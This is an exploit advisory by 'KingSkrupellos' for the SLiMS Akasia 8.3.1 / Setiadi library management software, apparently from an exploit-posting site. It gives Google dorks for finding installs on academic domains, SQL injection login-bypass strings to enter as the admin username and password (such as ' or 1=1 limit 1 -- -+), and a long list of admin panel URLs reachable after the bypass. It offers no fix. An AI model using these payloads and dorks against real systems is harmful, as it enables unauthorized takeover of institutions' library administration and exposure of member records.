#################################################################### # Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 20/05/2019 # Vendor Homepage : slimsetd.id - slims.web.id # Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia # Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1 # Software Version : 8.3.1 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id intext:Powered By SETIADI and ShapeBootstrap. site:ac.id # Vulnerability Type : CWE-285 [ Improper Authorization ] CWE-284 [ Improper Access Control ] CWE-592 [ Authentication Bypass Issues ] CWE-287 [ Improper Authentication ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Setiadi is an automation system that serves to manage repository such as thesis and dissertation. Setiadi is built based on SLiMS (Senayan Library Management System). Setiadi is an open source automation, licensed under GPL v3, built using PHP and MySQL database. SENAYAN Library Management System (SLiMS) version 8 Codename Akasia SLiMS is free open source software for library resources management (such as books, journals, digital document and other library materials) and administration such as collection circulation, collection management, membership, stock taking and many other else. #################################################################### # Impact : *********** The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. #################################################################### # Authentication Bypass / Improper Access Control / Improper Authorization Exploit : ************************************************************************** Admin Panel Login Path : ************************ /index.php?p=login /admin Admin Username : admin admin' -- '=''or' ' or 1=1 limit 1 -- -+ anything' OR 'x'='x Admin Password : admin admin' -- '=''or' ' or 1=1 limit 1 -- -+ anything' OR 'x'='x Useable Admin Control Panel Links Exploits : ****************************************** /admin/modules/system/app_user.php?changecurrent=true&action=detail /admin/index.php?mod=bibliography /admin/modules/bibliography/index.php?action=detail /admin/modules/bibliography/item.php /admin/modules/bibliography/checkout_item.php /admin/modules/bibliography/z3950sru.php /admin/modules/bibliography/z3950.php /admin/modules/bibliography/p2p.php /admin/modules/bibliography/dl_print.php /admin/modules/bibliography/item_barcode_generator.php /admin/modules/bibliography/marcexport.php /admin/modules/bibliography/marcimport.php /admin/modules/bibliography/printed_card.php /admin/modules/bibliography/export.php /admin/modules/bibliography/import.php /admin/modules/bibliography/item_export.php /admin/modules/bibliography/item_import.php /admin/index.php?mod=circulation /admin/modules/circulation/index.php?action=start /admin/modules/circulation/quick_return.php /admin/modules/circulation/loan_rules.php /admin/modules/reporting/customs/loan_history.php /admin/modules/reporting/customs/overdued_list.php /admin/modules/reporting/customs/reserve_list.php /admin/index.php?mod=membership /admin/modules/membership/index.php /admin/modules/membership/index.php?action=detail /admin/modules/membership/member_type.php /admin/modules/membership/member_card_generator.php /admin/modules/membership/export.php /admin/modules/membership/import.php /admin/index.php?mod=master_file /admin/modules/master_file/index.php /admin/modules/master_file/rda_cmc.php?type=content /admin/modules/master_file/rda_cmc.php?type=media /admin/modules/master_file/rda_cmc.php?type=carrier /admin/modules/master_file/publisher.php /admin/modules/master_file/supplier.php /admin/modules/master_file/author.php /admin/modules/master_file/topic.php /admin/modules/master_file/location.php /admin/modules/master_file/news_type.php /admin/modules/master_file/place.php /admin/modules/master_file/item_status.php /admin/modules/master_file/coll_type.php /admin/modules/master_file/doc_language.php /admin/modules/master_file/label.php /admin/modules/master_file/frequency.php /admin/modules/master_file/p2pservers.php /admin/modules/master_file/item_code_pattern.php /admin/modules/master_file/author.php?type=orphaned /admin/modules/master_file/topic.php?type=orphaned /admin/modules/master_file/publisher.php?type=orphaned /admin/modules/master_file/place.php?type=orphaned /admin/index.php?mod=stock_take /admin/modules/stock_take/index.php /admin/modules/stock_take/init.php /admin/modules/system/index.php /admin/index.php?mod=system /admin/modules/system/envinfo.php /admin/modules/system/ucsetting.php /admin/modules/system/theme.php /admin/modules/system/content.php /admin/modules/system/biblio_indexes.php /admin/modules/system/module.php /admin/modules/system/app_user.php /admin/modules/system/user_group.php /admin/modules/system/shortcut.php /admin/modules/system/holiday.php /admin/modules/system/barcode_generator.php /admin/modules/system/sys_log.php /admin/modules/system/backup.php /admin/index.php?mod=reporting /admin/modules/reporting/index.php /admin/modules/reporting/loan_report.php /admin/modules/reporting/member_report.php /admin/modules/reporting/customs/class_recap.php /admin/modules/reporting/customs/titles_list.php /admin/modules/reporting/customs/item_titles_list.php /admin/modules/reporting/customs/item_usage.php /admin/modules/reporting/customs/loan_by_class.php /admin/modules/reporting/customs/member_list.php /admin/modules/reporting/customs/member_loan_list.php /admin/modules/reporting/customs/loan_history.php /admin/modules/reporting/customs/due_date_warning.php /admin/modules/reporting/customs/overdued_list.php /admin/modules/reporting/customs/staff_act.php /admin/modules/reporting/customs/visitor_report.php /admin/modules/reporting/customs/visitor_report_day.php /admin/index.php?mod=chat /admin/index.php?mod=serial_control /admin/modules/serial_control/index.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################